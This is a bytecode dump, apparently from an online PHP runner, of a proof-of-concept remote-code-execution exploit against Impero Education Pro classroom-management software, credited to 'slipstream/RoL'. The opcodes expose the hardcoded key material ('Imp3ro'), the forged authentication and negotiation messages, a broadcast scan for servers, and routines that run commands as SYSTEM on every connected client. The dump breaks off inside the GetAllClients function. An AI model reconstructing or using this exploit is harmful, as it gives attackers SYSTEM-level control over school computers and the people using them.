Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 4, Position 2 = 15 Branch analysis from position: 4 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 15 2 jumps found. (Code = 77) Position 1 = 19, Position 2 = 71 Branch analysis from position: 19 2 jumps found. (Code = 78) Position 1 = 20, Position 2 = 71 Branch analysis from position: 20 2 jumps found. (Code = 43) Position 1 = 24, Position 2 = 46 Branch analysis from position: 24 2 jumps found. (Code = 43) Position 1 = 28, Position 2 = 29 Branch analysis from position: 28 1 jumps found. (Code = 42) Position 1 = 19 Branch analysis from position: 19 Branch analysis from position: 29 2 jumps found. (Code = 43) Position 1 = 41, Position 2 = 42 Branch analysis from position: 41 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 42 2 jumps found. (Code = 43) Position 1 = 52, Position 2 = 53 Branch analysis from position: 52 1 jumps found. (Code = 42) Position 1 = 19 Branch analysis from position: 19 Branch analysis from position: 53 2 jumps found. (Code = 43) Position 1 = 69, Position 2 = 70 Branch analysis from position: 69 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 70 1 jumps found. (Code = 42) Position 1 = 19 Branch analysis from position: 19 Branch analysis from position: 46 Branch analysis from position: 71 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 71 filename: /in/f2jt8 function name: (null) number of ops: 73 compiled vars: !0 = $socketid, !1 = $argc, !2 = $argv, !3 = $arg, !4 = $key, !5 = $detected, !6 = $h, !7 = $clients line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 141 0 E > ASSIGN !0, -1 142 1 ECHO '%5B%2A%5D+Impero+Education+Pro+SYSTEM-RCE+PoC+by+slipstream%2FRoL%5ELHQ%0A' 143 2 IS_SMALLER !1, 2 3 > JMPZ ~9, ->15 144 4 > FETCH_DIM_R ~10 !2, 0 5 CONCAT ~11 '%5B-%5D+Usage%3A+', ~10 6 CONCAT ~12 ~11, '+%3CserverIPs+space-delimited%3E%0A' 7 ECHO ~12 145 8 ECHO '%5B%2A%5D+If+you+pass+%22detect+%3Cif%3E+%3Cbroadcastmask%3E%22+%28without+quotes%29+as+serverIP+then+we+will+try+to+find+an+impero+server%2C+using+interface+and+broadcast+mask+given.%0A' 146 9 FETCH_DIM_R ~13 !2, 0 10 CONCAT ~14 '%5B%2A%5D+Example+of+this%3A+', ~13 11 CONCAT ~15 ~14, '+detect+vboxnet0+192.168.56.255%0A' 12 ECHO ~15 147 13 ECHO '%5B%2A%5D+This+PoC+will+pop+a+calc+and+run+whoami+%3E+C%3A%5Clol.txt+as+SYSTEM+on+%2Aevery+connected+client%2A%21%0A' 148 14 > EXIT 150 15 > INIT_FCALL 'array_shift' 16 SEND_REF !2 17 DO_ICALL 151 18 > FE_RESET_R $17 !2, ->71 19 > > FE_FETCH_R ~18 $17, !3, ->71 20 > ASSIGN !4, ~18 152 21 ASSIGN !5, <false> 153 22 IS_EQUAL !3, 'detect' 23 > JMPZ ~21, ->46 154 24 > ADD ~22 !4, 2 25 COUNT ~23 !2 26 IS_SMALLER_OR_EQUAL ~23, ~22 27 > JMPZ ~24, ->29 28 > > JMP ->19 155 29 > ECHO '%5B%2A%5D+Finding+Impero+server...%0A' 156 30 INIT_FCALL 'findimperoserver' 31 ADD ~25 !4, 1 32 FETCH_DIM_R ~26 !2, ~25 33 SEND_VAL ~26 34 ADD ~27 !4, 2 35 FETCH_DIM_R ~28 !2, ~27 36 SEND_VAL ~28 37 DO_FCALL 0 $29 38 ASSIGN !3, $29 157 39 BOOL_NOT ~31 !3 40 > JMPZ ~31, ->42 41 > > EXIT '%5B-%5D+Cannot+find+Impero+server%0A' 158 42 > CONCAT ~32 '%5B%2B%5D+Found+Impero+server+at+', !3 43 CONCAT ~33 ~32, '%0A' 44 ECHO ~33 159 45 ASSIGN !5, <true> 161 46 > INIT_FCALL 'connect' 47 SEND_VAR !3 48 DO_FCALL 0 $35 49 ASSIGN !6, $35 162 50 TYPE_CHECK 4 !6 51 > JMPZ ~37, ->53 52 > > JMP ->19 163 53 > INIT_FCALL 'getallclients' 54 SEND_VAR !6 55 DO_FCALL 0 $38 56 ASSIGN !7, $38 164 57 INIT_FCALL 'runexeassystem' 58 SEND_VAR !6 59 SEND_VAR !7 60 SEND_VAL 'calc' 61 DO_FCALL 0 165 62 INIT_FCALL 'runcmd' 63 SEND_VAR !6 64 SEND_VAR !7 65 SEND_VAL 'whoami+%3E+C%3A%5Clol.txt' 66 DO_FCALL 0 166 67 ECHO '%0A' 167 68 > JMPZ !5, ->70 69 > > EXIT 151 70 > > JMP ->19 71 > FE_FREE $17 168 72 > RETURN 1 Function padstring: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 42) Position 1 = 18 Branch analysis from position: 18 2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 9 Branch analysis from position: 20 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 9 2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 9 Branch analysis from position: 20 Branch analysis from position: 9 filename: /in/f2jt8 function name: PadString number of ops: 27 compiled vars: !0 = $str, !1 = $size, !2 = $pad, !3 = $padstr, !4 = $i line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 6 0 E > RECV !0 7 1 ASSIGN !1, 16 8 2 STRLEN ~6 !0 3 MOD ~7 ~6, !1 4 SUB ~8 !1, ~7 5 ASSIGN !2, ~8 9 6 ASSIGN !3, '' 10 7 ASSIGN !4, 1 8 > JMP ->18 11 9 > INIT_FCALL 'chr' 10 INIT_FCALL 'mt_rand' 11 SEND_VAL 0 12 SEND_VAL 255 13 DO_ICALL $12 14 SEND_VAR $12 15 DO_ICALL $13 16 ASSIGN_OP 8 !3, $13 10 17 PRE_INC !4 18 > IS_SMALLER !4, !2 19 > JMPNZ ~16, ->9 12 20 > CONCAT ~17 !0, !3 21 INIT_FCALL 'chr' 22 SEND_VAR !2 23 DO_ICALL $18 24 CONCAT ~19 ~17, $18 25 > RETURN ~19 13 26* > RETURN null End of function padstring Function unpadstring: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/f2jt8 function name: UnPadString number of ops: 16 compiled vars: !0 = $str line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 15 0 E > RECV !0 16 1 INIT_FCALL 'substr' 2 SEND_VAR !0 3 SEND_VAL 0 4 INIT_FCALL 'ord' 5 INIT_FCALL 'substr' 6 SEND_VAR !0 7 SEND_VAL -1 8 DO_ICALL $1 9 SEND_VAR $1 10 DO_ICALL $2 11 MUL ~3 $2, -1 12 SEND_VAL ~3 13 DO_ICALL $4 14 > RETURN $4 17 15* > RETURN null End of function unpadstring Function cryptstring: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/f2jt8 function name: CryptString number of ops: 33 compiled vars: !0 = $str, !1 = $hash, !2 = $key, !3 = $iv, !4 = $crypted line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 19 0 E > RECV !0 20 1 INIT_FCALL 'hash' 2 SEND_VAL 'sha512' 3 SEND_VAL 'Imp3ro' 4 SEND_VAL <true> 5 DO_ICALL $5 6 ASSIGN !1, $5 21 7 INIT_FCALL 'substr' 8 SEND_VAR !1 9 SEND_VAL 0 10 SEND_VAL 32 11 DO_ICALL $7 12 ASSIGN !2, $7 22 13 INIT_FCALL 'substr' 14 SEND_VAR !1 15 SEND_VAL 32 16 SEND_VAL 16 17 DO_ICALL $9 18 ASSIGN !3, $9 23 19 INIT_FCALL_BY_NAME 'mcrypt_encrypt' 20 FETCH_CONSTANT ~11 'MCRYPT_RIJNDAEL_128' 21 SEND_VAL_EX ~11 22 SEND_VAR_EX !2 23 INIT_FCALL 'padstring' 24 SEND_VAR !0 25 DO_FCALL 0 $12 26 SEND_VAR_NO_REF_EX $12 27 SEND_VAL_EX 'cbc' 28 SEND_VAR_EX !3 29 DO_FCALL 0 $13 30 ASSIGN !4, $13 24 31 > RETURN !4 25 32* > RETURN null End of function cryptstring Function decryptstring: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/f2jt8 function name: DecryptString number of ops: 32 compiled vars: !0 = $str, !1 = $hash, !2 = $key, !3 = $iv line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 27 0 E > RECV !0 28 1 INIT_FCALL 'hash' 2 SEND_VAL 'sha512' 3 SEND_VAL 'Imp3ro' 4 SEND_VAL <true> 5 DO_ICALL $4 6 ASSIGN !1, $4 29 7 INIT_FCALL 'substr' 8 SEND_VAR !1 9 SEND_VAL 0 10 SEND_VAL 32 11 DO_ICALL $6 12 ASSIGN !2, $6 30 13 INIT_FCALL 'substr' 14 SEND_VAR !1 15 SEND_VAL 32 16 SEND_VAL 16 17 DO_ICALL $8 18 ASSIGN !3, $8 31 19 INIT_FCALL 'unpadstring' 20 INIT_FCALL_BY_NAME 'mcrypt_decrypt' 21 FETCH_CONSTANT ~10 'MCRYPT_RIJNDAEL_128' 22 SEND_VAL_EX ~10 23 SEND_VAR_EX !2 24 SEND_VAR_EX !0 25 SEND_VAL_EX 'cbc' 26 SEND_VAR_EX !3 27 DO_FCALL 0 $11 28 SEND_VAR $11 29 DO_FCALL 0 $12 30 > RETURN $12 32 31* > RETURN null End of function decryptstring Function sendnetwork: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/f2jt8 function name: SendNetwork number of ops: 18 compiled vars: !0 = $h, !1 = $str, !2 = $socketid, !3 = $crypted line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 34 0 E > RECV !0 1 RECV !1 35 2 BIND_GLOBAL !2, 'socketid' 36 3 INIT_FCALL 'cryptstring' 4 CONCAT ~4 !2, '%7C' 5 CONCAT ~5 ~4, !1 6 SEND_VAL ~5 7 DO_FCALL 0 $6 8 ASSIGN !3, $6 37 9 INIT_FCALL_BY_NAME 'socket_write' 10 SEND_VAR_EX !0 11 STRLEN ~8 !3 12 CONCAT ~9 ~8, '%7C' 13 CONCAT ~10 ~9, !3 14 SEND_VAL_EX ~10 15 DO_FCALL 0 38 16 > RETURN null 39 17* > RETURN null End of function sendnetwork Function recvnetwork: Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 44) Position 1 = 11, Position 2 = 3 Branch analysis from position: 11 2 jumps found. (Code = 43) Position 1 = 15, Position 2 = 16 Branch analysis from position: 15 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 16 2 jumps found. (Code = 43) Position 1 = 37, Position 2 = 39 Branch analysis from position: 37 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 39 Branch analysis from position: 3 filename: /in/f2jt8 function name: RecvNetwork number of ops: 42 compiled vars: !0 = $h, !1 = $len, !2 = $chr, !3 = $crypted, !4 = $dec, !5 = $socketid line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 41 0 E > RECV !0 42 1 ASSIGN !1, '' 43 2 ASSIGN !2, '' 45 3 > ASSIGN_OP 8 !1, !2 46 4 INIT_FCALL_BY_NAME 'socket_read' 5 SEND_VAR_EX !0 6 SEND_VAL_EX 1 7 DO_FCALL 0 $9 8 ASSIGN !2, $9 47 9 IS_NOT_EQUAL !2, '%7C' 10 > JMPNZ ~11, ->3 48 11 > CAST 4 ~12 !1 12 ASSIGN !1, ~12 49 13 IS_SMALLER !1, 1 14 > JMPZ ~14, ->16 15 > > EXIT 'Something%27s+wrong.+Length+isn%27t+an+int.' 50 16 > INIT_FCALL_BY_NAME 'socket_set_block' 17 SEND_VAR_EX !0 18 DO_FCALL 0 51 19 INIT_FCALL_BY_NAME 'socket_read' 20 SEND_VAR_EX !0 21 SEND_VAR_EX !1 22 DO_FCALL 0 $16 23 ASSIGN !3, $16 52 24 INIT_FCALL 'decryptstring' 25 SEND_VAR !3 26 DO_FCALL 0 $18 27 ASSIGN !4, $18 53 28 BIND_GLOBAL !5, 'socketid' 54 29 INIT_FCALL 'explode' 30 SEND_VAL '%7C' 31 SEND_VAR !4 32 SEND_VAL 2 33 DO_ICALL $20 34 ASSIGN !4, $20 55 35 IS_EQUAL !5, -1 36 > JMPZ ~22, ->39 37 > FETCH_DIM_R ~23 !4, 0 38 ASSIGN !5, ~23 56 39 > FETCH_DIM_R ~25 !4, 1 40 > RETURN ~25 57 41* > RETURN null End of function recvnetwork Function connect: Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 47) Position 1 = 17, Position 2 = 24 Branch analysis from position: 17 2 jumps found. (Code = 43) Position 1 = 25, Position 2 = 27 Branch analysis from position: 25 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 27 2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 41 Branch analysis from position: 39 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 41 1 jumps found. (Code = 42) Position 1 = 55 Branch analysis from position: 55 2 jumps found. (Code = 44) Position 1 = 57, Position 2 = 48 Branch analysis from position: 57 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 48 2 jumps found. (Code = 44) Position 1 = 57, Position 2 = 48 Branch analysis from position: 57 Branch analysis from position: 48 Branch analysis from position: 24 filename: /in/f2jt8 function name: Connect number of ops: 60 compiled vars: !0 = $host, !1 = $port, !2 = $h, !3 = $data, !4 = $i line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 59 0 E > RECV !0 1 RECV_INIT !1 30015 60 2 ECHO 'Connecting...' 61 3 INIT_FCALL_BY_NAME 'socket_create' 4 FETCH_CONSTANT ~5 'AF_INET' 5 SEND_VAL_EX ~5 6 FETCH_CONSTANT ~6 'SOCK_STREAM' 7 SEND_VAL_EX ~6 8 FETCH_CONSTANT ~7 'SOL_TCP' 9 SEND_VAL_EX ~7 10 DO_FCALL 0 $8 11 ASSIGN !2, $8 62 12 INIT_FCALL_BY_NAME 'socket_set_block' 13 SEND_VAR_EX !2 14 DO_FCALL 0 63 15 BOOL_NOT ~11 !2 16 > JMPNZ_EX ~11 ~11, ->24 17 > INIT_FCALL_BY_NAME 'socket_connect' 18 SEND_VAR_EX !2 19 SEND_VAR_EX !0 20 SEND_VAR_EX !1 21 DO_FCALL 0 $12 22 BOOL_NOT ~13 $12 23 BOOL ~11 ~13 24 > > JMPZ ~11, ->27 64 25 > ECHO 'failed.%0A' 65 26 > RETURN <false> 67 27 > ECHO 'done%21%0AAuthenticating...' 69 28 INIT_FCALL 'sendnetwork' 29 SEND_VAR !2 30 SEND_VAL 'AUTHENTICATE%02PASSWORD' 31 DO_FCALL 0 70 32 ECHO 'done%21%0AWaiting+for+response...' 72 33 INIT_FCALL 'recvnetwork' 34 SEND_VAR !2 35 DO_FCALL 0 $15 36 ASSIGN !3, $15 73 37 IS_NOT_EQUAL !3, 'AUTH%3AOK' 38 > JMPZ ~17, ->41 74 39 > ECHO 'authentication+failed.%0A' 75 40 > RETURN <false> 77 41 > ECHO 'authentication+succeeded%21%0ANegotiating...' 78 42 INIT_FCALL 'sendnetwork' 43 SEND_VAR !2 44 SEND_VAL 'PING1%02IE11WIN7%03%035003%019f579e0f20cb18c8bc1ee4f2dc5d9aeb%01c0d3fd41a05add5e6d7c8b64924bef86%018dc3a6ceec8a51e1fd2e7e688db44417%01d1554e349fc677e6011309683ac1b85b%012b94f70093e484b8fc7f62a4670377ea' 45 DO_FCALL 0 80 46 ASSIGN !4, 0 47 > JMP ->55 81 48 > INIT_FCALL 'recvnetwork' 49 SEND_VAR !2 50 DO_FCALL 0 82 51 INIT_FCALL 'usleep' 52 SEND_VAL 500000 53 DO_ICALL 80 54 PRE_INC !4 55 > IS_SMALLER !4, 4 56 > JMPNZ ~23, ->48 85 57 > ECHO 'done%21%0A' 86 58 > RETURN !2 87 59* > RETURN null End of function connect Function getallclients: Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 77) Position 1 = 32, Position 2 = 43 Branch analysis from position: 32 2 jumps found. (Code = 78) Position 1 = 33, Position 2 = 43 Branch analysis from position: 33 1 jumps found. (Code = 42) Position 1 = 32 Branch analysis from position: 32 Branch analysis from position: 43 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 43 filename: /in/f2jt8 function name: GetAllClients number of ops:
Generated using Vulcan Logic Dumper, using php 8.0.0